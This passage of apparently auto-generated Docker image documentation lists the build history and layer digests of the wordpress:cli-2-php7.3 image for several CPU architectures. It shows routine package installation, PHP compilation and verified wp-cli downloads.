}' )"; apk add --virtual .wordpress-phpexts-rundeps $runDeps; apk del .build-deps # Fri, 11 Jan 2019 03:53:43 GMT RUN { echo 'opcache.memory_consumption=128'; echo 'opcache.interned_strings_buffer=8'; echo 'opcache.max_accelerated_files=4000'; echo 'opcache.revalidate_freq=2'; echo 'opcache.fast_shutdown=1'; echo 'opcache.enable_cli=1'; } > /usr/local/etc/php/conf.d/opcache-recommended.ini # Fri, 11 Jan 2019 03:53:45 GMT RUN apk add --no-cache bash less mysql-client # Fri, 11 Jan 2019 03:53:45 GMT RUN set -ex; mkdir -p /var/www/html; chown -R www-data:www-data /var/www/html # Fri, 11 Jan 2019 03:53:46 GMT WORKDIR /var/www/html # Fri, 11 Jan 2019 03:53:46 GMT VOLUME [/var/www/html] # Fri, 11 Jan 2019 03:53:46 GMT ENV WORDPRESS_CLI_GPG_KEY=63AF7AA15067C05616FDDD88A3A2E8F226F0BC06 # Fri, 11 Jan 2019 03:53:46 GMT ENV WORDPRESS_CLI_VERSION=2.1.0 # Fri, 11 Jan 2019 03:53:47 GMT ENV WORDPRESS_CLI_SHA512=c2ff556c21c85bbcf11be38d058224f53d3d57a1da45320ecf0079d480063dcdc11b5029b94b0b181c1e3bec84745300cd848d28065c0d3619f598980cc17244 # Fri, 11 Jan 2019 03:53:51 GMT RUN set -ex; apk add --no-cache --virtual .fetch-deps gnupg ; curl -o /usr/local/bin/wp.gpg -fSL "https://github.com/wp-cli/wp-cli/releases/download/v${WORDPRESS_CLI_VERSION}/wp-cli-${WORDPRESS_CLI_VERSION}.phar.gpg"; export GNUPGHOME="$(mktemp -d)"; gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$WORDPRESS_CLI_GPG_KEY"; gpg --batch --decrypt --output /usr/local/bin/wp /usr/local/bin/wp.gpg; command -v gpgconf && gpgconf --kill all || :; rm -rf "$GNUPGHOME" /usr/local/bin/wp.gpg; echo "$WORDPRESS_CLI_SHA512 */usr/local/bin/wp" | sha512sum -c -; chmod +x /usr/local/bin/wp; apk del .fetch-deps; wp --allow-root --version # Fri, 11 Jan 2019 03:53:51 GMT COPY file:7798dc600ff57df68d7de781fd8834d5a9371b2ab13ab9649086b34ee0e38fcf in /usr/local/bin/ # Fri, 11 Jan 2019 03:53:51 GMT ENTRYPOINT ["docker-entrypoint.sh"] # Fri, 11 Jan 2019 03:53:51 GMT USER www-data # Fri, 11 Jan 2019 03:53:51 GMT CMD ["wp" "shell"] ``` - Layers: - `sha256:cd784148e3483c2c86c50a48e535302ab0288bebd587accf40b714fffd0646b3` Last Modified: Fri, 21 Dec 2018 00:23:44 GMT Size: 2.2 MB (2207025 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:d207535cd57f878f70cace5fa6b787bea470b519e83a0ad0d8b65fab8c3c4e6d` Last Modified: Fri, 21 Dec 2018 03:57:44 GMT Size: 1.4 MB (1353714 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:1167ab95319c6a4c7a06ffb91e63738c89f46e9005296b25e2f2ea414b102a16` Last Modified: Fri, 21 Dec 2018 03:57:44 GMT Size: 1.3 KB (1251 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:bff34bff7f50ba85c4ee1c081add1128c1e00de9eb29733452f99cd0508cd0e0` Last Modified: Fri, 21 Dec 2018 03:57:44 GMT Size: 167.0 B MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:66e94b04823810ed063753fdaea78690cd0d1d66ed7f0c7e344b374f42a772c8` Last Modified: Fri, 11 Jan 2019 01:52:34 GMT Size: 12.0 MB (11963975 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:99e3e3c4962f32e7bde3f06a7f3b06c267d45997d8efcc977ed11343e433e479` Last Modified: Fri, 11 Jan 2019 01:52:33 GMT Size: 495.0 B MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:ba2a46850bd8ca2e6f8d17ab27963e766fcb36e16b8a460c731fa31886a5377d` Last Modified: Fri, 11 Jan 2019 01:52:38 GMT Size: 16.1 MB (16084720 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:5b81efef4b8bb8938b52edcb4e88358cfd293f49c0342ddd399a7f7ab0bc5ab6` Last Modified: Fri, 11 Jan 2019 01:52:33 GMT Size: 2.2 KB (2172 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:12868485c51a8fdf9ff2d6ebde76fd041caddaff2159c943a3cc873bd251f1a3` Last Modified: Fri, 11 Jan 2019 01:52:33 GMT Size: 71.8 KB (71846 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:b44549710c52dc434ae2130a97daf213280d6580c9e03155c16819799ef26f61` Last Modified: Fri, 11 Jan 2019 03:57:14 GMT Size: 2.2 MB (2238963 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:2ba15c7b3be39f5be6b6d78b684136991ffb3e6bd4cd1528bfc15bbb56855d70` Last Modified: Fri, 11 Jan 2019 03:57:13 GMT Size: 337.0 B MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:4ac57f71c6ae56873c387de714ef93c30403635b01d3d6a4051a3dd966430c0f` Last Modified: Fri, 11 Jan 2019 03:57:18 GMT Size: 9.1 MB (9081200 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:8285946d281e1c1d57a250434cda9b65618b14ac627501bfb1fd44b0e72a3eef` Last Modified: Fri, 11 Jan 2019 03:57:13 GMT Size: 134.0 B MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:32aaecb7a8fc3451e83761052fa43da61c572a24e11a80cdf5d8e3cf2140ffb1` Last Modified: Fri, 11 Jan 2019 03:57:14 GMT Size: 1.2 MB (1217579 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:8615d9db9a2ab2b688eb214df552acd80c87a14af93eb22ab6a68edcb8b8875d` Last Modified: Fri, 11 Jan 2019 03:57:14 GMT Size: 418.0 B MIME: application/vnd.docker.image.rootfs.diff.tar.gzip ### `wordpress:cli-2-php7.3` - linux; arm variant v6 ```console $ docker pull wordpress@sha256:71792f460be8c09bc8d40404f2eda3a3403efb960be30d6c031519ad30fbf5e8 ``` - Docker Version: 18.06.1-ce - Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json` - Total Size: **42.6 MB (42562211 bytes)** (compressed transfer size, not on-disk size) - Image ID: `sha256:2e0acd1a293186bda4d19a3a7835179b7c97a402bdd8b5429bdddbfd99a0ce42` - Entrypoint: `["docker-entrypoint.sh"]` - Default Command: `["wp","shell"]` ```dockerfile # Fri, 21 Dec 2018 08:49:49 GMT ADD file:38d34e3ff051a263eab785aca5763d350b82063f0356752117e168349d9e3811 in / # Fri, 21 Dec 2018 08:49:50 GMT COPY file:a10c133d8d5e9af3a9a1610709d3ed2f85b1507f1ba5745ac12bb495974e3fe6 in /etc/localtime # Fri, 21 Dec 2018 08:49:50 GMT CMD ["/bin/sh"] # Fri, 21 Dec 2018 09:57:17 GMT ENV PHPIZE_DEPS=autoconf dpkg-dev dpkg file g++ gcc libc-dev make pkgconf re2c # Fri, 21 Dec 2018 09:57:19 GMT RUN apk add --no-cache --virtual .persistent-deps ca-certificates curl tar xz libressl # Fri, 21 Dec 2018 09:57:21 GMT RUN set -x && addgroup -g 82 -S www-data && adduser -u 82 -D -S -G www-data www-data # Fri, 21 Dec 2018 09:57:22 GMT ENV PHP_INI_DIR=/usr/local/etc/php # Fri, 21 Dec 2018 09:57:23 GMT RUN mkdir -p $PHP_INI_DIR/conf.d # Fri, 21 Dec 2018 09:57:24 GMT ENV PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 # Fri, 21 Dec 2018 09:57:24 GMT ENV PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 # Fri, 21 Dec 2018 09:57:24 GMT ENV PHP_LDFLAGS=-Wl,-O1 -Wl,--hash-style=both -pie # Fri, 21 Dec 2018 09:57:25 GMT ENV GPG_KEYS=CBAF69F173A0FEA4B537F470D66C9593118BCCB6 F38252826ACD957EF380D39F2F7956BC5DA04B5D # Fri, 11 Jan 2019 08:54:16 GMT ENV PHP_VERSION=7.3.1 # Fri, 11 Jan 2019 08:54:17 GMT ENV PHP_URL=https://secure.php.net/get/php-7.3.1.tar.xz/from/this/mirror PHP_ASC_URL=https://secure.php.net/get/php-7.3.1.tar.xz.asc/from/this/mirror # Fri, 11 Jan 2019 08:54:17 GMT ENV PHP_SHA256=cfe93e40be0350cd53c4a579f52fe5d8faf9c6db047f650a4566a2276bf33362 PHP_MD5= # Fri, 11 Jan 2019 08:54:23 GMT RUN set -xe; apk add --no-cache --virtual .fetch-deps gnupg wget ; mkdir -p /usr/src; cd /usr/src; wget -O php.tar.xz "$PHP_URL"; if [ -n "$PHP_SHA256" ]; then echo "$PHP_SHA256 *php.tar.xz" | sha256sum -c -; fi; if [ -n "$PHP_MD5" ]; then echo "$PHP_MD5 *php.tar.xz" | md5sum -c -; fi; if [ -n "$PHP_ASC_URL" ]; then wget -O php.tar.xz.asc "$PHP_ASC_URL"; export GNUPGHOME="$(mktemp -d)"; for key in $GPG_KEYS; do gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$key"; done; gpg --batch --verify php.tar.xz.asc php.tar.xz; command -v gpgconf > /dev/null && gpgconf --kill all; rm -rf "$GNUPGHOME"; fi; apk del .fetch-deps # Fri, 11 Jan 2019 08:54:24 GMT COPY file:ce57c04b70896f77cc11eb2766417d8a1240fcffe5bba92179ec78c458844110 in /usr/local/bin/ # Fri, 11 Jan 2019 08:57:38 GMT RUN set -xe && apk add --no-cache --virtual .build-deps $PHPIZE_DEPS argon2-dev coreutils curl-dev libedit-dev libressl-dev libsodium-dev libxml2-dev sqlite-dev && export CFLAGS="$PHP_CFLAGS" CPPFLAGS="$PHP_CPPFLAGS" LDFLAGS="$PHP_LDFLAGS" && docker-php-source extract && cd /usr/src/php && gnuArch="$(dpkg-architecture --query DEB_BUILD_GNU_TYPE)" && ./configure --build="$gnuArch" --with-config-file-path="$PHP_INI_DIR" --with-config-file-scan-dir="$PHP_INI_DIR/conf.d" --enable-option-checking=fatal --with-mhash --enable-ftp --enable-mbstring --enable-mysqlnd --with-password-argon2 --with-sodium=shared --with-curl --with-libedit --with-openssl --with-zlib $(test "$gnuArch" = 's390x-linux-gnu' && echo '--without-pcre-jit') $PHP_EXTRA_CONFIGURE_ARGS && make -j "$(nproc)" && make install && { find /usr/local/bin /usr/local/sbin -type f -perm +0111 -exec strip --strip-all '{}' + || true; } && make clean && cp -v php.ini-* "$PHP_INI_DIR/" && cd / && docker-php-source delete && runDeps="$( scanelf --needed --nobanner --format '%n#p' --recursive /usr/local | tr ',' '\n' | sort -u | awk 'system("[ -e /usr/local/lib/" $1 " ]") == 0 { next } { print "so:" $1 }' )" && apk add --no-cache --virtual .php-rundeps $runDeps && apk del .build-deps && pecl update-channels && rm -rf /tmp/pear ~/.pearrc # Fri, 11 Jan 2019 08:57:39 GMT COPY multi:ca5e0e0a22a9acaec52323defcda7c7634bb6522f257ec20bee1888aede2387a in /usr/local/bin/ # Fri, 11 Jan 2019 08:57:41 GMT RUN docker-php-ext-enable sodium # Fri, 11 Jan 2019 08:57:42 GMT ENTRYPOINT ["docker-php-entrypoint"] # Fri, 11 Jan 2019 08:57:42 GMT CMD ["php" "-a"] # Fri, 11 Jan 2019 09:01:40 GMT RUN set -ex; apk add --no-cache --virtual .build-deps libjpeg-turbo-dev libpng-dev libzip-dev ; docker-php-ext-configure gd --with-png-dir=/usr --with-jpeg-dir=/usr; docker-php-ext-install gd mysqli opcache zip; runDeps="$( scanelf --needed --nobanner --format '%n#p' --recursive /usr/local/lib/php/extensions | tr ',' '\n' | sort -u | awk 'system("[ -e /usr/local/lib/" $1 " ]") == 0 { next } { print "so:" $1 }' )"; apk add --virtual .wordpress-phpexts-rundeps $runDeps; apk del .build-deps # Fri, 11 Jan 2019 09:01:42 GMT RUN { echo 'opcache.memory_consumption=128'; echo 'opcache.interned_strings_buffer=8'; echo 'opcache.max_accelerated_files=4000'; echo 'opcache.revalidate_freq=2'; echo 'opcache.fast_shutdown=1'; echo 'opcache.enable_cli=1'; } > /usr/local/etc/php/conf.d/opcache-recommended.ini # Fri, 11 Jan 2019 09:01:44 GMT RUN apk add --no-cache bash less mysql-client # Fri, 11 Jan 2019 09:01:46 GMT RUN set -ex; mkdir -p /var/www/html; chown -R www-data:www-data /var/www/html # Fri, 11 Jan 2019 09:01:47 GMT WORKDIR /var/www/html # Fri, 11 Jan 2019 09:01:47 GMT VOLUME [/var/www/html] # Fri, 11 Jan 2019 09:01:48 GMT ENV WORDPRESS_CLI_GPG_KEY=63AF7AA15067C05616FDDD88A3A2E8F226F0BC06 # Fri, 11 Jan 2019 09:01:48 GMT ENV WORDPRESS_CLI_VERSION=2.1.0 # Fri, 11 Jan 2019 09:01:49 GMT ENV WORDPRESS_CLI_SHA512=c2ff556c21c85bbcf11be38d058224f53d3d57a1da45320ecf0079d480063dcdc11b5029b94b0b181c1e3bec84745300cd848d28065c0d3619f598980cc17244 # Fri, 11 Jan 2019 09:01:54 GMT RUN set -ex; apk add --no-cache --virtual .fetch-deps gnupg ; curl -o /usr/local/bin/wp.gpg -fSL "https://github.com/wp-cli/wp-cli/releases/download/v${WORDPRESS_CLI_VERSION}/wp-cli-${WORDPRESS_CLI_VERSION}.phar.gpg"; export GNUPGHOME="$(mktemp -d)"; gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$WORDPRESS_CLI_GPG_KEY"; gpg --batch --decrypt --output /usr/local/bin/wp /usr/local/bin/wp.gpg; command -v gpgconf && gpgconf --kill all || :; rm -rf "$GNUPGHOME" /usr/local/bin/wp.gpg; echo "$WORDPRESS_CLI_SHA512 */usr/local/bin/wp" | sha512sum -c -; chmod +x /usr/local/bin/wp; apk del .fetch-deps; wp --allow-root --version # Fri, 11 Jan 2019 09:01:55 GMT COPY file:7798dc600ff57df68d7de781fd8834d5a9371b2ab13ab9649086b34ee0e38fcf in /usr/local/bin/ # Fri, 11 Jan 2019 09:01:55 GMT ENTRYPOINT ["docker-entrypoint.sh"] # Fri, 11 Jan 2019 09:01:56 GMT USER www-data # Fri, 11 Jan 2019 09:01:56 GMT CMD ["wp" "shell"] ``` - Layers: - `sha256:5b678b67777fc7983d3563839cc9d511de267ec6de1961f2b590d552d8bfa105` Last Modified: Fri, 21 Dec 2018 08:50:18 GMT Size: 2.1 MB (2145782 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:d9f0b2b885d968636a597331169fce72a69964c911558554f1b2a0d21959f34f` Last Modified: Fri, 21 Dec 2018 08:50:17 GMT Size: 175.0 B MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:bdc871048391cb58798d04e007efbbf6dea290177b14aa82474e0cd8a847e5de` Last Modified: Fri, 21 Dec 2018 11:04:45 GMT Size: 1.3 MB (1315320 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:d14e9b8b66e27ebf8c37feef99cb0c249e36805f3566d73882beca6671f44f61` Last Modified: Fri, 21 Dec 2018 11:04:44 GMT Size: 1.3 KB (1277 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:01a2d87e934f6881656d209530a5523fac4c28881bb465188a3ad7a4d3e4ddcf` Last Modified: Fri, 21 Dec 2018 11:04:44 GMT Size: 198.0 B MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:c443263c644199b4f1e52db37b5c9b47a16309bcf35924e362b0d5c417c6a9b5` Last Modified: Fri, 11 Jan 2019 09:03:20 GMT Size: 12.0 MB (11963994 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:baaa4162305dd8cc9365e9ee82714844fdd022b83c686dbc30b7f34d3889d9de` Last Modified: Fri, 11 Jan 2019 09:03:19 GMT Size: 496.0 B MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:ea5fe97b079788b12fcc2b6c6d959966a8fa65b6767f7764f8e63de519c3de16` Last Modified: Fri, 11 Jan 2019 09:03:24 GMT Size: 15.1 MB (15057916 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:a944ad312ee97b55b1fa2616e5d9b0d4a11122d4b958131fe6b246894dfb0cb8` Last Modified: Fri, 11 Jan 2019 09:03:18 GMT Size: 2.2 KB (2175 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:21142fad48c46983b764f484eb7f08f7d13b313b0e1a12c84577e95272edc790` Last Modified: Fri, 11 Jan 2019 09:03:18 GMT Size: 71.4 KB (71380 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:643568d3cfc6c4d5a1e6f4200ad01d03a3ccd61a3657e8ea01d8ac93d45e5925` Last Modified: Fri, 11 Jan 2019 09:03:18 GMT Size: 2.1 MB (2132655 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:0a195a83205efba44aae3eff39997e159fb2c26033d238ef1f9eb7e13890a2a6` Last Modified: Fri, 11 Jan 2019 09:03:16 GMT Size: 334.0 B MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:952b6fac74e8b7d0b9c65625014a53b2a4c8cba51cce0044211fc71dcba79c7f` Last Modified: Fri, 11 Jan 2019 09:03:19 GMT Size: 8.7 MB (8652590 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:17aaf264c55b33330b6d7024d4de082a7fbb9e5228ea6261df065b67558f5715` Last Modified: Fri, 11 Jan 2019 09:03:16 GMT Size: 167.0 B MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:aff3ee432631b4b0016ca28994c78defed051a926c9ce750304c807120454600` Last Modified: Fri, 11 Jan 2019 09:03:17 GMT Size: 1.2 MB (1217339 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:d9a6445cad1bdaf81cc1223137b759fca749e89032bc10ed935d29ed5a980b9c` Last Modified: Fri, 11 Jan 2019 09:03:16 GMT Size: 413.0 B MIME: application/vnd.docker.image.rootfs.diff.tar.gzip ### `wordpress:cli-2-php7.3` - linux; arm64 variant v8 ```console $ docker pull wordpress@sha256:45f42a431c714837c9d70a454975e45f8879df19428afe44c1cf14859d1763c6 ``` - Docker Version: 18.06.1-ce - Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json` - Total Size: **42.5 MB (42477335 bytes)** (compressed transfer size, not on-disk size) - Image ID: `sha256:40ffc97ae771066298de7089a07c60668a5edb7789fd6d5fb2d0a25792239613` - Entrypoint: `["docker-entrypoint.sh"]` - Default Command: `["wp","shell"]` ```dockerfile # Fri, 21 Dec 2018 09:43:06 GMT ADD file:79419748674899ac7d5d699fe62f837c69d04af3ceaabbb7951c35c2f0ff46fa in / # Fri, 21 Dec 2018 09:43:07 GMT COPY file:a10c133d8d5e9af3a9a1610709d3ed2f85b1507f1ba5745ac12bb495974e3fe6 in /etc/localtime # Fri, 21 Dec 2018 09:43:07 GMT CMD ["/bin/sh"] # Fri, 21 Dec 2018 12:10:06 GMT ENV PHPIZE_DEPS=autoconf dpkg-dev dpkg file g++ gcc libc-dev make pkgconf re2c # Fri, 21 Dec 2018 12:10:08 GMT RUN apk add --no-cache --virtual .persistent-deps ca-certificates curl tar xz libressl # Fri, 21 Dec 2018 12:10:11 GMT RUN set -x && addgroup -g 82 -S www-data && adduser -u 82 -D -S -G www-data www-data # Fri, 21 Dec 2018 12:10:11 GMT ENV PHP_INI_DIR=/usr/local/etc/php # Fri, 21 Dec 2018 12:10:13 GMT RUN mkdir -p $PHP_INI_DIR/conf.d # Fri, 21 Dec 2018 12:10:14 GMT ENV PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 # Fri, 21 Dec 2018 12:10:15 GMT ENV PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 # Fri, 21 Dec 2018 12:10:15 GMT ENV PHP_LDFLAGS=-Wl,-O1 -Wl,--hash-style=both -pie # Fri, 21 Dec 2018 12:10:16 GMT ENV GPG_KEYS=CBAF69F173A0FEA4B537F470D66C9593118BCCB6 F38252826ACD957EF380D39F2F7956BC5DA04B5D # Fri, 11 Jan 2019 10:55:54 GMT ENV PHP_VERSION=7.3.1 # Fri, 11 Jan 2019 10:55:55 GMT ENV PHP_URL=https://secure.php.net/get/php-7.3.1.tar.xz/from/this/mirror PHP_ASC_URL=https://secure.php.net/get/php-7.3.1.tar.xz.asc/from/this/mirror # Fri, 11 Jan 2019 10:55:56 GMT ENV PHP_SHA256=cfe93e40be0350cd53c4a579f52fe5d8faf9c6db047f650a4566a2276bf33362 PHP_MD5= # Fri, 11 Jan 2019 10:56:10 GMT RUN set -xe; apk add --no-cache --virtual .fetch-deps gnupg wget ; mkdir -p /usr/src; cd /usr/src; wget -O php.tar.xz "$PHP_URL"; if [ -n "$PHP_SHA256" ]; then echo "$PHP_SHA256 *php.tar.xz" | sha256sum -c -; fi; if [ -n "$PHP_MD5" ]; then echo "$PHP_MD5 *php.tar.xz" | md5sum -c -; fi; if [ -n "$PHP_ASC_URL" ]; then wget -O php.tar.xz.asc "$PHP_ASC_URL"; export GNUPGHOME="$(mktemp -d)"; for key in $GPG_KEYS; do gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$key"; done; gpg --batch --verify php.tar.xz.asc php.tar.xz; command -v gpgconf > /dev/null && gpgconf --kill all; rm -rf "$GNUPGHOME"; fi; apk del .fetch-deps # Fri, 11 Jan 2019 10:56:10 GMT COPY file:ce57c04b70896f77cc11eb2766417d8a1240fcffe5bba92179ec78c458844110 in /usr/local/bin/ # Fri, 11 Jan 2019 11:03:28 GMT RUN set -xe && apk add --no-cache --virtual .build-deps $PHPIZE_DEPS argon2-dev coreutils curl-dev libedit-dev libressl-dev libsodium-dev libxml2-dev sqlite-dev && export CFLAGS="$PHP_CFLAGS" CPPFLAGS="$PHP_CPPFLAGS" LDFLAGS="$PHP_LDFLAGS" && docker-php-source extract && cd /usr/src/php && gnuArch="$(dpkg-architecture --query DEB_BUILD_GNU_TYPE)" && ./configure --build="$gnuArch" --with-config-file-path="$PHP_INI_DIR" --with-config-file-scan-dir="$PHP_INI_DIR/conf.d" --enable-option-checking=fatal --with-mhash --enable-ftp --enable-mbstring --enable-mysqlnd --with-password-argon2 --with-sodium=shared --with-curl --with-libedit --with-openssl --with-zlib $(test "$gnuArch" = 's390x-linux-gnu' && echo '--without-pcre-jit') $PHP_EXTRA_CONFIGURE_ARGS && make -j "$(nproc)" && make install && { find /usr/local/bin /usr/local/sbin -type f -perm +0111 -exec strip --strip-all '{}' + || true; } && make clean && cp -v php.ini-* "$PHP_INI_DIR/" && cd / && docker-php-source delete && runDeps="$( scanelf --needed --nobanner --format '%n#p' --recursive /usr/local | tr ',' '\n' | sort -u | awk 'system("[ -e /usr/local/lib/" $1 " ]") == 0 { next } { print "so:" $1 }' )" && apk add --no-cache --virtual .php-rundeps $runDeps && apk del .build-deps && pecl update-channels && rm -rf /tmp/pear ~/.pearrc # Fri, 11 Jan 2019 11:03:29 GMT COPY multi:ca5e0e0a22a9acaec52323defcda7c7634bb6522f257ec20bee1888aede2387a in /usr/local/bin/ # Fri, 11 Jan 2019 11:03:33 GMT RUN docker-php-ext-enable sodium # Fri, 11 Jan 2019 11:03:34 GMT ENTRYPOINT ["docker-php-entrypoint"] # Fri, 11 Jan 2019 11:03:35 GMT CMD ["php" "-a"] # Tue, 15 Jan 2019 11:47:12 GMT RUN set -ex; apk add --no-cache --virtual .build-deps libjpeg-turbo-dev libpng-dev libzip-dev ; docker-php-ext-configure gd --with-png-dir=/usr --with-jpeg-dir=/usr; docker-php-ext-install gd mysqli opcache zip; runDeps="$( scanelf --needed --nobanner --format '%n#p' --recursive /usr/local/lib/php/extensions | tr ',' '\n' | sort -u | awk 'system("[ -e /usr/local/lib/" $1 " ]") == 0 { next } { print "so:" $1 }' )"; apk add --virtual .wordpress-phpexts-rundeps $runDeps; apk del .build-deps # Tue, 15 Jan 2019 11:47:14 GMT RUN { echo 'opcache.memory_consumption=128'; echo 'opcache.interned_strings_buffer=8'; echo 'opcache.max_accelerated_files=4000'; echo 'opcache.revalidate_freq=2'; echo 'opcache.fast_shutdown=1'; echo 'opcache.enable_cli=1'; } > /usr/local/etc/php/conf.d/opcache-recommended.ini # Tue, 15 Jan 2019 11:47:18 GMT RUN apk add --no-cache bash less mysql-client # Tue, 15 Jan 2019 11:47:20 GMT RUN set -ex; mkdir -p /var/www/html; chown -R www-data:www-data /var/www/html # Tue, 15 Jan 2019 11:47:21 GMT WORKDIR /var/www/html # Tue, 15 Jan 2019 11:47:21 GMT VOLUME [/var/www/html] # Tue, 15 Jan 2019 11:47:22 GMT ENV WORDPRESS_CLI_GPG_KEY=63AF7AA15067C05616FDDD88A3A2E8F226F0BC06 # Tue, 15 Jan 2019 11:47:23 GMT ENV WORDPRESS_CLI_VERSION=2.1.0 # Tue, 15 Jan 2019 11:47:23 GMT ENV WORDPRESS_CLI_SHA512=c2ff556c21c85bbcf11be38d058224f53d3d57a1da45320ecf0079d480063dcdc11b5029b94b0b181c1e3bec84745300cd848d28065c0d3619f598980cc17244 # Tue, 15 Jan 2019 11:47:31 GMT RUN set -ex; apk add --no-cache --virtual .fetch-deps gnupg ; curl -o /usr/local/bin/wp.gpg -fSL "https://github.com/wp-cli/wp-cli/releases/download/v${WORDPRESS_CLI_VERSION}/wp-cli-${WORDPRESS_CLI_VERSION}.phar.gpg"; export GNUPGHOME="$(mktemp -d)"; gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$WORDPRESS_CLI_GPG_KEY"; gpg --batch --decrypt --output /usr/local/bin/wp /usr/local/bin/wp.gpg; command -v gpgconf && gpgconf --kill all || :; rm -rf "$GNUPGHOME" /usr/local/bin/wp.gpg; echo "$WORDPRESS_CLI_SHA512 */usr/local/bin/wp" | sha512sum -c -; chmod +x /usr/local/bin/wp; apk del .fetch-deps; wp --allow-root --version # Tue, 15 Jan 2019 11:47:31 GMT COPY file:7798dc600ff57df68d7de781fd8834d5a9371b2ab13ab9649086b34ee0e38fcf in /usr/local/bin/ # Tue, 15 Jan 2019 11:47:32 GMT ENTRYPOINT ["docker-entrypoint.sh"] # Tue, 15 Jan 2019 11:47:33 GMT USER www-data # Tue, 15 Jan 2019 11:47:33 GMT CMD ["wp" "shell"] ``` - Layers: - `sha256:e3c488b39803d9194cf010f6127b1121d5387b90a1562d44b50b749d0e7a69bf` Last Modified: Fri, 21 Dec 2018 09:43:51 GMT Size: 2.1 MB (2099839 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:05a63128803b1ea223f87244cb8d3faa97817f6cf3ca8249e485430218758510` Last Modified: Fri, 21 Dec 2018 09:43:50 GMT Size: 176.0 B MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:73bf4a12ae92b20610d889c240ddcd72b338a21e3fa4f3d6c077d9fcad3566f1` Last Modified: Fri, 21 Dec 2018 14:38:54 GMT Size: 1.3 MB (1274014 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:cf309e8a13c2d5f8e92a71c30f189658629d7079402a4dbd6c42d8a5302b755e` Last Modified: Fri, 21 Dec 2018 14:38:54 GMT Size: 1.3 KB (1251 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:2290f763cb3e9ff58547451226cdcbb3b5083ab00da970fb03b03604c2c78716` Last Modified: Fri, 21 Dec 2018 14:38:53 GMT Size: 167.0 B MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:d29d279f772308a9b51733dca1ab082169fa4730b1061bf0d290c8558790660f` Last Modified: Fri, 11 Jan 2019 13:25:34 GMT Size: 12.0 MB (11963994 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:d97b087212776073e0a8dc3eddf2374da2b75a476490d6cadfa09a2f527a1894` Last Modified: Fri, 11 Jan 2019 13:25:32 GMT Size: 497.0 B MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:0b1fda473f4aa619af2dfa55a7b522352a9194772d7a7ed6797a764481e562b0` Last Modified: Fri, 11 Jan 2019 13:25:40 GMT Size: 14.9 MB (14909157 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:4352bfea612034631ffb0c6f43b271c95edf7d96466157d3d6b2a2ebf47ea55d` Last Modified: Fri, 11 Jan 2019 13:25:32 GMT Size: 2.2 KB (2173 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:07283019f979e447e8227da3597957f9080e91d6bdef3cd102f6619c6a047a9e` Last Modified: Fri, 11 Jan 2019 13:25:32 GMT Size: 70.9 KB (70867 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:eaf5b87d7c0615140d8a304c33df488b6db78cee853079726772035f77242673` Last Modified: Tue, 15 Jan 2019 11:50:12 GMT Size: 2.1 MB (2128351 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:8329c77cdd76c6af1898f7427be271ea20622cf03ae9c288471ee056a383f266` Last Modified: Tue, 15 Jan 2019 11:50:10 GMT Size: 338.0 B MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:80e8a753f1ec86a471a84091fdb344e029fd4da266cad5ecdd1f194f25829b98` Last Modified: Tue, 15 Jan 2019 11:50:13 GMT Size: 8.8 MB (8809049 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - 